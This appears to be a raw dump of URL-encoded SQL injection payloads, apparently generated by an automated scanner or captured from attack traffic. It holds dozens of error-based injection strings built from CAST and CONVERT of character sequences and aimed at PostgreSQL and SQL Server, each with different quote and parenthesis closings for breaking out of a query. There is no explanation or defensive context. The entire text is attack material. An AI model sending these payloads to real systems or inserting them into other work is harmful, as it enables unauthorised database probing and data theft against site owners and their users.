-8200%22%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22qUil%22%3D%22qUil -4095%22%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22QPYZ%22%3D%22QPYZ -2504%22%29%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22RWwn%22%3D%22RWwn -4627%22%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22MBjw%22%3D%22MBjw -9589%22%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22Drlx%22%20LIKE%20%22Drlx -1887%22%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22xibj%22%20LIKE%20%22xibj -6320%22%29%29%29%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22ANUE%22%20LIKE%20%22ANUE -5650%22%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22PLcp%22%20LIKE%20%22PLcp -9557%29%20WHERE%203830%3D3830%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -6562%27%29%20WHERE%202451%3D2451%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -1134%27%20WHERE%208549%3D8549%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -7018%22%20WHERE%209617%3D9617%20OR%209704%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289704%3D9704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -8683%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -8811%27%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -9028%27%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -9976%22%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -3393%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%281401%3D1401 -7898%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%283420%3D3420 -7094%29%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%287240%3D7240 -6212%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -1860%27%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27dFRQ%27%3D%27dFRQ -9169%27%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27zAmA%27%3D%27zAmA -8346%27%29%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27SvUZ%27%3D%27SvUZ -3494%27%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27WhDp%27%3D%27WhDp -5948%27%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27QcOy%27%20LIKE%20%27QcOy -3205%27%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27mjqC%27%20LIKE%20%27mjqC -4134%27%29%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27vXej%27%20LIKE%20%27vXej -6365%27%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27FxrE%27%20LIKE%20%27FxrE -2064%22%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22IzPH%22%3D%22IzPH -9251%22%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22IuAo%22%3D%22IuAo -7567%22%29%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22nkCS%22%3D%22nkCS -1367%22%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22rEmZ%22%3D%22rEmZ -5981%22%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22QUwF%22%20LIKE%20%22QUwF -5338%22%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22wdNr%22%20LIKE%20%22wdNr -9313%22%29%29%29%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22tDRa%22%20LIKE%20%22tDRa -9212%22%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22ncEB%22%20LIKE%20%22ncEB -4434%29%20WHERE%201748%3D1748%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -3475%27%29%20WHERE%206954%3D6954%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -7044%27%20WHERE%206826%3D6826%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -8442%22%20WHERE%209975%3D9975%20OR%201122%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -5522%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -7058%27%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -9188%27%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -2779%22%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -6337%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%289733%3D9733 -2748%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%287225%3D7225 -8886%29%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%289843%3D9843 -1121%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -4370%27%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27kSXb%27%3D%27kSXb -4337%27%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27OEmo%27%3D%27OEmo -9571%27%29%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27Ljhr%27%3D%27Ljhr -1012%27%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27nTdt%27%3D%27nTdt -8068%27%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27Vyvy%27%20LIKE%20%27Vyvy -8656%27%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27USfq%27%20LIKE%20%27USfq -7792%27%29%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27oXjq%27%20LIKE%20%27oXjq -6236%27%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27fdYX%27%20LIKE%20%27fdYX -4249%22%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22SkkL%22%3D%22SkkL -4093%22%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22CnFs%22%3D%22CnFs -9353%22%29%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22Gzmf%22%3D%22Gzmf -8679%22%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22JyQw%22%3D%22JyQw 